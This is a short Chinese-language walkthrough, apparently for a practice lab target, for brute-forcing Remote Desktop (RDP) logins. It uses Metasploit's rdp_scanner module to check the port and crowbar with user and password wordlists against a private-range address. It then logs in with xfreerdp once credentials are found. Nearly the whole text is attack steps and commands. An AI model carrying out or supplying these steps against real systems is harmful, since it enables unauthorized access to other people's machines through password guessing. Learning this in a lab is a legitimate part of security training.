先用msfconsole搜索auxiliary辅助模块里面rdp_scanner并使用,检测目标是否打开端口等。

然后打开crowbar工具

输入参数 python3 crowbar.py -b rdp -s 192.168.xx.xx/32 -U user_file -C pass_file

然后等待爆破

然后sudo xfreerdp /u:user /p:password /v:靶机ip

即可捕捉界面,完成。